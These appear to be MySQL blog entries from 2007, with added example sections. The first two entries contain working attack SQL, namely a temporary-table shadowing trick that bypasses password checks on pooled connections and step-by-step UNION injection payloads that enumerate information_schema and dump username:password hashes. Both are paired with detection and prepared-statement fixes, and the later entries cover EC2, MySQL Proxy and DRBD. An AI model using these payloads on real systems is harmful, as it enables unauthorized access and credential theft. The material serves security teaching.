Morgan Tocker
Saturday, December 15th, 2007
3:11p
Proof of concept attack when using connection pooling.
mysql> create database attack;
Query OK, 1 row affected (0.00 sec)
mysql> use attack;
Database changed
mysql> create table users (id INT UNSIGNED NOT NULL PRIMARY KEY auto_increment, username varchar(30) NOT NULL,
password char(32) NOT NULL, UNIQUE KEY (username));
Query OK, 0 rows affected (0.00 sec)
mysql> INSERT into users (username, password) VALUES ('morgo', MD5('my_password')),
('ted', MD5('another_password'));
Query OK, 2 rows affected (0.41 sec)
Records: 2 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM users;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | morgo | a865a7e0ddbf35fa6f6a232e0893bea4 |
| 2 | ted | 280fb9194368f9d1d44f8ddcc13f2717 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
mysql> CREATE TEMPORARY TABLE users_copy LIKE users;
Query OK, 0 rows affected (0.04 sec)
mysql> INSERT into users_copy SELECT id, username, md5('anything') FROM users;
Query OK, 2 rows affected (0.00 sec)
Records: 2 Duplicates: 0 Warnings: 0
mysql> CREATE TEMPORARY TABLE users LIKE users_copy;
Query OK, 0 rows affected (0.01 sec)
mysql> INSERT INTO users SELECT * FROM users_copy;
Query OK, 2 rows affected (0.00 sec)
Records: 2 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM users;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | morgo | f0e166dc34d14d6c228ffac576c9a43c |
| 2 | ted | f0e166dc34d14d6c228ffac576c9a43c |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
Notice the subtle attack? It is a documented feature that a TEMPORARY table can have the same name as a base table, and for the rest of the session the temporary table takes precedence. Normally this isn't a problem, because a temporary table is visible only to the session that created it. With connection pooling, though, the session does not end when the application's request does: the next caller handed that connection gets the shadow table instead of the real users table, and every account now "matches" md5('anything'). Two things bound the damage. The shadow lives only until the connection is actually closed or reset (mysql_change_user() drops temporary tables along with the rest of the session state, so a pool that resets connections before reusing them is not exposed), and creating it requires the CREATE TEMPORARY TABLES privilege, which the pooled application account should only hold if it genuinely needs it.
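An added check and cleanup for the pooled-connection case above. This is example SQL written for this page, not code from the original post. It assumes the attack.users base table and the shadowing temporary table from the session above, that the current session is the pooled connection the next caller receives, and a hypothetical application account 'webapp'@'localhost'. SHOW CREATE TABLE reports CREATE TEMPORARY TABLE when a name resolves to a temporary table, and DROP TEMPORARY TABLE can only ever remove a temporary table, so it is safe to run blind.

```sql
-- Added example, not part of the original post. Assumes the attack.users
-- base table plus the TEMPORARY TABLE users / users_copy shadow created
-- in the session above, and that this is the pooled connection handed
-- to the next caller.

USE attack;

-- 1. Does 'users' currently resolve to the real table?
--    While the shadow is in place this shows "CREATE TEMPORARY TABLE `users` ...";
--    for the base table it shows "CREATE TABLE `users` ...".
SHOW CREATE TABLE users;

-- 2. The catalog only lists base tables, so it still reports the real
--    'users' even while the shadow hides it from queries. A name that
--    SHOW CREATE TABLE calls TEMPORARY but information_schema lists as a
--    BASE TABLE is a shadowed table.
SELECT table_name, table_type
  FROM information_schema.tables
 WHERE table_schema = DATABASE() AND table_name = 'users';

-- 3. Cleanup that is safe to run unconditionally whenever a connection
--    is handed out: the TEMPORARY keyword means a base table by the same
--    name is never touched, and IF EXISTS makes it a no-op on a clean session.
DROP TEMPORARY TABLE IF EXISTS users, users_copy;

-- 4. The base table is visible again and the real hashes are back.
SHOW CREATE TABLE users;
SELECT id, username, password FROM users;

-- 5. Prevention: the pooled application account should not be able to
--    create the shadow in the first place. 'webapp'@'localhost' is a
--    hypothetical account name; REVOKE errors if it never held the privilege.
REVOKE CREATE TEMPORARY TABLES ON attack.* FROM 'webapp'@'localhost';
```

Steps 3 and 5 belong in the pool's checkout hook and in the grant script respectively; step 1 is only for confirming a suspected shadow by hand, since a pool cannot know in advance which table names an attacker chose.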
3:22p
I [heart] information_schema
With MySQL 5.0, SQL injection attacks get much easier, because you can UNION against information_schema and enumerate the schema from inside an injected SELECT. You couldn't do that with the old SHOW commands, which cannot be combined with another query. i.e.
SELECT * FROM users WHERE id = $id;
becomes:
SELECT * FROM users WHERE id = 0 UNION
SELECT group_concat(table_name) FROM information_schema.tables
WHERE table_schema=DATABASE() group by table_schema;
The rule for a UNION in MySQL is that every SELECT must return the same number of columns as the first one (the types are coerced, so a constant or NULL works as a placeholder). If you don't know how many columns the original query has, you can just keep adding placeholders until the column-count error goes away:
SELECT group_concat(table_name), 1, 2, 3, 4 FROM information_schema.tables
WHERE table_schema=DATABASE() group by table_schema;
I presented on these types of attacks here.
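The whole enumeration carried through, as an added example that is not from the original post. It assumes the attack.users table from the first entry (three columns: id, username, password) and a hypothetical application query SELECT * FROM users WHERE id = $id that pastes $id in unescaped. It goes one step past the post by reading information_schema.columns as well as information_schema.tables, and it finishes with the fix: MySQL's own server-side prepared statement syntax, where the attacker's input is only ever a parameter value.

```sql
-- Added example, not from the original post. Assumes attack.users
-- (id, username, password) and an application query
--     SELECT * FROM users WHERE id = $id
-- with $id unescaped. Each step shows the injected $id in a comment,
-- then the statement the server actually receives.

USE attack;

-- Step 1: find the column count. ORDER BY n sorts by the n-th column and
-- fails with "Unknown column 'n' in 'order clause'" once n exceeds it.
--   $id = 1 ORDER BY 3     succeeds
--   $id = 1 ORDER BY 4     ERROR 1054, so the query has 3 columns
SELECT * FROM users WHERE id = 1 ORDER BY 3;
SELECT * FROM users WHERE id = 1 ORDER BY 4;

-- The same probe with UNION: NULL is compatible with every column type,
-- so only the count has to match for this to run.
--   $id = 0 UNION SELECT NULL, NULL, NULL
SELECT * FROM users WHERE id = 0 UNION SELECT NULL, NULL, NULL;

-- Step 2: list the tables in the current schema. id = 0 matches no real
-- row, so the only row that comes back is the injected one. Dropping
-- the table_schema filter lists every schema the account can see.
--   $id = 0 UNION SELECT NULL, group_concat(table_name), NULL FROM
--         information_schema.tables WHERE table_schema = DATABASE()
SELECT * FROM users WHERE id = 0
UNION SELECT NULL, group_concat(table_name), NULL
      FROM information_schema.tables
     WHERE table_schema = DATABASE();

-- Step 3: list the columns of an interesting table, in definition order.
SELECT * FROM users WHERE id = 0
UNION SELECT NULL, group_concat(column_name ORDER BY ordinal_position), NULL
      FROM information_schema.columns
     WHERE table_schema = DATABASE() AND table_name = 'users';

-- Step 4: pull the data. 0x3a is ':' as a hex literal, which keeps the
-- payload free of quote characters the application might escape.
SELECT * FROM users WHERE id = 0
UNION SELECT NULL, group_concat(username, 0x3a, password SEPARATOR ','), NULL
      FROM users;

-- Caveat: group_concat() silently truncates its result at
-- @@group_concat_max_len bytes (1024 by default). A long table or column
-- list needs LIMIT/OFFSET inside the injected SELECT, because a plain
-- injected SELECT cannot raise the limit for itself.

-- The fix: never assemble the statement from strings. With a server-side
-- prepared statement the input is bound as a value, so the payload from
-- step 1 is compared to the numeric id column as a number (0) and the
-- UNION text is never parsed as SQL.
SET @id = '0 UNION SELECT NULL, NULL, NULL';
PREPARE get_user FROM 'SELECT * FROM users WHERE id = ?';
EXECUTE get_user USING @id;
DEALLOCATE PREPARE get_user;
```

The application-side equivalent is whatever parameter binding the driver offers (mysqli prepared statements in PHP, for instance); the PREPARE/EXECUTE form is shown only because it demonstrates the property in the same language as the attack.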
3:35p
Conferences for Next Year
I figure while I'm in the blogging spirit, I should announce where you can catch me presenting early next year:

March 12-14 - PHP Quebec
* Security from the Database Perspective
* Breaking the Rules

April 14-17 - MySQL Conference
* Exploring Amazon EC2 for Scale Out Applications

May 21-23 - php|tek
* Performance Tuning MySQL
* Designing for High Availability

I decided to do something different and submit about 10 outlines for possible talks, so it's interesting to see what each of the organizers eventually arrive at.
3:47p
A strange use for MySQL Proxy
I've been talking to some Montrealers about using Amazon EC2. One of the small issues with EC2 is that you have no fixed IP addresses for your instances. This means that people are having to use DNS, which works well 99% of the time[1]. One of the problems for me is that I can't as easily have a virtual interface which is the IP address of the current master database server; I have to have a hostname like mysql-master.mydomain.com. Which means that if I switch masters, I have to wait for the TTL length for old clients to stop connecting to the previous master (in talking to RightScale, they set it to 45 seconds; PeterZ has blogged about why not to use 0-second TTLs here).

The possible solution: when you switch masters, the previous master shuts down mysqld and loads up the proxy to forward to the new master.

[1] See: http://dev.mysql.com/doc/refman/5.0/en/dns.html. Also just Google for skip-name-resolve to see the issues people have with flaky DNS servers.
7:03p
Should you run DRBD with EC2?
I had some free time this weekend, so I thought I would give DRBD a look on EC2... It wasn't long before I made a discovery:
etch:~# ifconfig
eth0 Link encap:Ethernet HWaddr 12:31:38:00:35:37
inet addr:10.252.58.197 Bcast:10.252.59.255 Mask:255.255.254.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:82547 errors:0 dropped:0 overruns:0 frame:0
TX packets:41818 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:121402208 (115.7 MiB) TX bytes:2645395 (2.5 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
At least from the perspective of my instance, there's only one network interface. Maybe the host has more than one with bonding, but unless I can prove that for certain, it's just an accident (split brain) waiting to happen. Read Florian's notes on this here.